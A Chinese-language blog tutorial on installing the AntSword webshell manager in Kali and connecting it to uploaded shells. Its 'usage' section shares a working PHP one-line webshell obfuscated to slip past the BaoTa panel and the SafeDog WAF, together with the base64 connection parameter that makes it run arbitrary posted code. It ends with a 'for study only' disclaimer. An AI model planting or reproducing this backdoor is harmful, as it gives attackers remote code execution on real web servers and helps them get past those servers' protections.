前言

我们在学习中，通常会上传我们的shell。从而和服务器获得连接。一般我们都是利用nc等工具进行连接的。但苦于命令行，对于新手而言还是有点困难。有没有方便一点的图形化工具呢？今天他来了！

中国蚁剑？

中国蚁剑是一种跨平台操作工具，它主要提供给用户用于有效的网络渗透测试以及进行正常运行的网站。除了这款工具之外，还有一款工具叫 中国菜刀 。但是该工具优势要比第二者强大。

安装

因为该工具是跨平台的，因为本文将讲解如何在kali中进行安装。首先，我们到其项目仓库下载该项目。

首次打开时，界面如下图所示：

点击初始化按钮，选择一个空目录作为蚁剑的工作目录，加载器会自动下载源代码。待提示初始化完毕时，重新打开蚁剑加载器，即可看到蚁剑的主界面。

注意，因网络原因。下载需要一段时间。下载完后后，再次进入程序效果如下：

使用

在这里分享一个常用的过宝塔和狗的一句话。

<?php
if(isset($_REQUEST['phpsessid'])){
    class A { static $d;
    }
    class B extends A {
    }
    A::$d =base64_decode(substr($_POST['key'],3));
    eval(B::$d);
}
?>

中国蚁剑连接参数 key=aaaZXZhbCgkX1BPU1RbMV0pOw==&1

打开AntSword，在空白右键，弹出菜单，选择 添加数据

完成后，我们一起来看看效果吧

虚拟终端

文件管理

数据库操作

总结

AntSword（中国蚁剑）是一款不错的一句话连接工具。功能丰富而且支持多平台。除此之外在kali中也又类似的工具如weevely生成shell和连接shell都十分方便。感兴趣的可以试试。最后文本所诉工具仅为学习和研究，坚决抵制一切危害网络安全的行为。造成法律后果自行负责，且行且珍惜！